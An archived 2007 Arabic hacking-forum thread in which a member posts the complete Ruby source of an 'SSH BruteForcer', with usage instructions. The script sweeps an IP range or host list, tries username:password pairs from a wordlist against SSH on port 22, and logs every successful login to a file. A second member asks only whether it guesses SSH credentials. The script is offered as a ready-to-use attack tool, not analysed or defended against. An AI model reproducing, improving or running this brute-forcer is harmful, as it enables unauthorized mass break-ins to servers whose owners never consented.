ضع اعلانك هنا

ضع اعلانك هنا ضع اعلانك هنا منتديات بوابة الاسلام
التاريخ 2008-8-13 التاريخ 2008-8-15 ضع اعلانك هنا ضع اعلانك هنا
 
قديم 11-27-2007, 10:58 PM   #1 (permalink)
عضو فعال
 
الصورة الرمزية Dr.the bright boy







Dr.the bright boy غير متصل

Dr.the bright boy will become famous soon enoughDr.the bright boy will become famous soon enough

افتراضي SSH BruteForcer (rb) priv8 ver1.0

بسم الله الرحمن الرحيم

IN THE NAME OF ALLAH THE ENTIRELY MERCIFUL THE SPECIALLY MERCIFUL

كود:
<| n3rdz |>
SSH BruteForcer (rb) priv8 ver1.0
Usage:./alm3refh_ssh startip endip user_pass.txt iplist.txt
</| n3rdz |\>

كود:
#!/usr/bin/ruby require 'rubygems' require 'net/ssh' require 'logger' require 'timeout' def usage() puts "Rubby SSH Bruteforcer Coded by nrktx (priv8 with XP GROUP)\n" puts "Usage:./alm3refh_ssh startip endip user_pass.txt iplist.txt\n" end if ARGV[0] == nil && ARGV[1] == nil && ARGV[2] == nil && ARGV[3] == nil usage() exit end vicstart = ARGV[0].to_s vicend = ARGV[1].to_s vicfile = ARGV[2].to_s hostfile = ARGV[3].to_s def ipholocast(startip,endip,vicfile) # 31.31.31.31 index1 = startip.index(".") #3 index2 = startip[index1+1..startip.length].index(".") + index1 + 1 #7 index3 = startip[index2+1..startip.length].index(".") + index2 +1 #10 ip1 = startip[0...index1].to_i ip2 = startip[index1+1...index2].to_i ip3 = startip[index2+1...index3].to_i ip4 = startip[index3+1...startip.length].to_i index1 = endip.index(".") #3 index2 = endip[index1+1..endip.length].index(".") + index1 + 1 #7 index3 = endip[index2+1..endip.length].index(".") + index2 +1 #10 ipe1 = endip[0...index1].to_i ipe2 = endip[index1+1...index2].to_i ipe3 = endip[index2+1...index3].to_i ipe4 = endip[index3+1...endip.length].to_i for m in 0...255 next if ip1 > 254 if ip1 == 254 ip1 = 0 end for l in 0...255 next if ip2 > 254 if ip2 == 254 ip2 = 0 end for k in 0...255 next if ip3 > 254 if ip3 == 254 ip3 = 0 end ###################### for i in 0...255 next if ip4 > 254 if ip4 == 254 ip4 = 0 end victim = ip1.to_s + "." + ip2.to_s + "." + ip3.to_s + "." + ip4.to_s failed = 1 open(vicfile.to_s,"r") do |hoho| hoho.readlines.each do |lines| owned = open("lamer.txt","a+") z = lines.index(":") username = lines[0...z] password = lines[z+1..lines.length].to_s.chop puts "Now trying Host = " + victim + " Username = " + username + " Password = " + password timeout(5) do begin session = Net::SSH.start(victim,22,username,password, :host_key => "ssh-rsa", :encryption => "blowfish-cbc" # :compression => "zlib" ) rescue Errno::ECONNREFUSED => h failed = 1 rescue Timeout::Error => f failed = 1 rescue Net::SSH::AuthenticationFailed => e failed = 1 rescue Errno::EHOSTUNREACH => x failed = 1 end end if failed != 1 owned.write victim + ":" + username + ":" + password + "\n" owned.close() end failed = 0 end end if ip1 == ipe1 && ip2 == ipe2 && ip3 == ipe3 && ip4 == ipe4 puts "SCAN DONE\n" exit end ip4 = ip4 + 1 end ####################### ip3 = ip3 +1 end ip2 = ip2 +1 end ip1 = ip1 +1 end end ######################################################### def ipholocast2(vicfile,hostfile) open(hostfile.to_s,"r") do |deads| deads.readlines.each do |zombie| zombie.chop failed = 0 open(vicfile.to_s,"r") do |hoho| hoho.readlines.each do |lines| owned = open("lamer.txt","a+") z = lines.index(":") username = lines[0...z] password = lines[z+1..lines.length].chop #puts "Now trying Host = " + zombie + " Username = " + username + " Password = " + password timeout(5) do begin session = Net::SSH.start(zombie,22,username,password, :host_key => "ssh-rsa", :encryption => "blowfish-cbc" # :compression => "zlib" ) rescue Errno::ECONNREFUSED => haha failed = 1 rescue Timeout::Error => f failed = 1 rescue Net::SSH::AuthenticationFailed => e failed = 1 rescue Errno::EHOSTUNREACH => x failed = 1 end end if failed != 1 owned.write zombie.chop + ":" + username + ":" + password + "\n" owned.close() end failed = 0 end end end end end ################################################# if hostfile.to_i == 1 ipholocast(vicstart,vicend,vicfile) end ipholocast2(vicfile,hostfile)

التوقيع

X_Dr.the bright boy_X
أسد المخترقين


Q8Crackers TeaM Crew

perl/cgi/php/xml/python/jython/ruby/lisp/c/c++/Delphi/j4v4/ASM/ajax/asp/jsp/1337/jailshell/bash/c0b0l/c-fusion/pike/tcl/tk/VXc0de/reb0l/
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 11-28-2007, 10:03 PM   #2 (permalink)
عضو فعال
 
الصورة الرمزية Mr-Viros







Mr-Viros غير متصل

Mr-Viros has a spectacular aura aboutMr-Viros has a spectacular aura aboutMr-Viros has a spectacular aura about

افتراضي رد: SSH BruteForcer (rb) priv8 ver1.0

يعطيك العافيه أسد المخترقين

انا قريت الكود و حاولت أفهم منه و على ما اعتقد انه تخمين لمعلومات الــssh ،، و لا لا؟؟

تحياتي لك يالغالي،،
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
إضافة رد

SSH BruteForcer (rb) priv8 ver1.0

منتدى أدوات وبرامج الإختراق





الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are متاحة


الساعة الآن 04:35 AM.

عدد الكلمات الدلالية 70 الاكثر بحث في الموقع
الكلمات الدلالية
اخبار ادوات اطفال الاستثمار البرفست البيزون الدروس الروافض السعوديه السنه الشيعه العاب الفلاش الفوتو شوب الكويت المجوس المهدي الهكر ايران برامج برامج اختراق برامج هكر بنات تحميل تشفير تشقير الصفحات تطوير تعليم ثغره جرائم جوال حماية حوار دروس دومين رواتر شرح صميم صوره فضائح فيديو كتاب كراك كمبيوتر محاضرات منتدى مودم نطاق نوكيا هوز bifrost buffer crypter domain downloader exploit file inclusion iran local overflow password poison python server shellcode sql injection trojan version vulnerability youtube


روابط مهمة

أقسام المنتدى


الرسول الإنسان | الدفاع عن أهل السنة | فضائح و جرائم الروافض | السنه | الحوارات الهادفة | الفلاش والسويتش | الفوتوشوب | دورة الفوتوشوب | صور | العاب | البرامج المشروحه | الفرفشه والمرح | الرياضة | الفايروسات | الهاردوير والصيانة | تطوير المنتديات والمواقع | دورة تطوير منتديات vb | الحمايه | اختراق المواقع والسيرفرات | هكرز | اختراق الشات والاميل | ثغرات | البرامج | الفيجوال بيسك | المواضيع العامه | القصص واللغات|  شات


Powered by vBulletin Version 3.7.1
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd
لا تتحمل إدارة منتديات عالم المعرفة أية مسؤولية حول أي موضوع يطرح في المنتدى فإن المكتوب يعبر عن رأى صاحبه أو ناقلة

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58